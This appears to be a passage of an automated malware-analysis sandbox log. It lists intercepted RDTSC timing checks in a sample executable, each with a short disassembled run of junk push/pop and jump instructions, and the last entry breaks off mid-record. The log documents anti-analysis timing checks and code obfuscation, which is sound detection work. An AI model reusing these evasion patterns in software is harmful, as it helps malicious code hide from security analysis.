Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107A40D second address: 107A413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD45 second address: 107AD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD4B second address: 107AD4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD4F second address: 107AD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD58 second address: 107AD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB19901BDD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD64 second address: 107AD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 107AD69 second address: 107AD96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE1h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB19901BDE8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1083849 second address: 108384D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1082B20 second address: 1082B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB19901BDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1082C82 second address: 1082C99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1082DFD second address: 1082E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108A324 second address: 108A32D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108A32D second address: 108A337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108A337 second address: 108A340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108A711 second address: 108A715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108AA19 second address: 108AA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FB19901BD13h 0x0000000a pushad 0x0000000b jmp 00007FB19901BD14h 0x00000010 jp 00007FB19901BD06h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108AB81 second address: 108AB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB19901BDD6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108B2E6 second address: 108B2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108B2EA second address: 108B2FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108BA64 second address: 108BA8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FB19901BD06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB19901BD0Fh 0x00000015 jmp 00007FB19901BD0Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 108BA8D second address: 108BAB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB19901BDE5h 0x0000000e je 00007FB19901BDD6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1089B5A second address: 1089B60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10925C9 second address: 10925D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1091FDB second address: 1091FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1092124 second address: 1092132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jg 00007FB19901BDD6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 109F564 second address: 109F575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BD0Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 109F575 second address: 109F57B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 109F57B second address: 109F57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FD0355 second address: FD036D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 jns 00007FB19901BDD6h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FB19901BDD6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A2AE8 second address: 10A2AF4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB19901BD0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A2AF4 second address: 10A2AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A2C89 second address: 10A2C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A2C8D second address: 10A2C91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A696D second address: 10A6971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A6971 second address: 10A697B instructions: 0x00000000 rdtsc 0x00000002 js 00007FB19901BDD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10A697B second address: 10A6981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10AB0C5 second address: 10AB0D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDDDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10B3033 second address: 10B3037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10B3037 second address: 10B303D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10BF5CF second address: 10BF5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10BE44A second address: 10BE467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB19901BDDEh 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FB19901BDD6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10BE89D second address: 10BE8A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FB19901BD06h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10C1A07 second address: 10C1A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007FB19901BDE2h 0x0000000d jne 00007FB19901BDEFh 0x00000013 jl 00007FB19901BDDCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10C1A47 second address: 10C1A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10C1A52 second address: 10C1A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10C1A56 second address: 10C1A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10C4886 second address: 10C4899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FB19901BDDEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10D5597 second address: 10D55C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Ah 0x00000007 push edx 0x00000008 jg 00007FB19901BD06h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop esi 0x00000017 jmp 00007FB19901BD10h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10D5421 second address: 10D5431 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB19901BDE2h 0x00000008 jl 00007FB19901BDD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10DA9FD second address: 10DAA4F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FB19901BD19h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FB19901BD20h 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FB19901BD18h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB19901BD11h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10E66DA second address: 10E66E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10E8D3F second address: 10E8D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB19901BD17h 0x0000000a js 00007FB19901BD18h 0x00000010 jmp 00007FB19901BD12h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FB19901BD10h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10E8D89 second address: 10E8D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10ECFE6 second address: 10ED002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BD0Dh 0x00000009 jmp 00007FB19901BD0Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10ED002 second address: 10ED006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 11067D2 second address: 11067D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 11067D8 second address: 11067DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 11067DE second address: 11067E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 11067E5 second address: 11067EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 11067EA second address: 11067F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110696C second address: 110699F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007FB19901BDDDh 0x0000000d jmp 00007FB19901BDDEh 0x00000012 jmp 00007FB19901BDDFh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A329 second address: 110A33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BD0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A3BB second address: 110A3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A3C1 second address: 110A3EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FB19901BD0Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A3EC second address: 110A3FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BDDFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A5B5 second address: 110A5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110A949 second address: 110A950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110D421 second address: 110D427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110D427 second address: 110D42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 110D42D second address: 110D450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BD12h 0x00000009 popad 0x0000000a jl 00007FB19901BD14h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D30123 second address: 4D3015A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB19901BDE6h 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx edi, cx 0x00000014 pushad 0x00000015 movzx ecx, dx 0x00000018 popad 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov ebx, ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10E00 second address: 4D10E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB19901BD0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10E12 second address: 4D10E41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FB19901BDE6h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10E41 second address: 4D10E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10E47 second address: 4D10E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 763A2128h 0x00000008 movsx edi, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FB19901BDE5h 0x00000018 or al, 00000046h 0x0000001b jmp 00007FB19901BDE1h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10E86 second address: 4D10E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10E8B second address: 4D10EC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 pushfd 0x00000006 jmp 00007FB19901BDE6h 0x0000000b add cl, 00000018h 0x0000000e jmp 00007FB19901BDDBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov di, 8C06h 0x00000020 mov si, bx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10EC6 second address: 4D10ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10ECB second address: 4D10F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB19901BDE4h 0x0000000a and cl, FFFFFFA8h 0x0000000d jmp 00007FB19901BDDBh 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB19901BDE0h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10F0B second address: 4D10F11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50E3E second address: 4D50E51 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dl, FBh 0x0000000e mov si, C3C7h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D50E51 second address: 4D50E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB19901BD13h 0x00000009 sbb si, 978Eh 0x0000000e jmp 00007FB19901BD19h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF00D4 second address: 4CF00D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF00D8 second address: 4CF00DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF00DE second address: 4CF00E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF00E4 second address: 4CF00E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF00E8 second address: 4CF0102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB19901BDDDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF0102 second address: 4CF0134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FB19901BD13h 0x00000014 mov di, si 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF0134 second address: 4CF013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF013A second address: 4CF013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4CF013E second address: 4CF0142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 4D10AF8 second address: 4D10BAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007FB19901BD0Eh 0x00000010 call 00007FB19901BD12h 0x00000015 pop esi 0x00000016 pop ebx 0x00000017 mov esi, 218095C7h 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007FB19901BD0Dh 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 movzx ecx, bx 0x00000028 pushfd 0x00000029 jmp 00007FB19901BD19h 0x0000002e xor al, 00000016h 0x00000031 jmp 00007FB19901BD11h 0x00000036 popfd 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FB19901BD13h 0x00000043 sub ax, 1C4Eh 0x00000048 jmp 00007FB19901BD19h 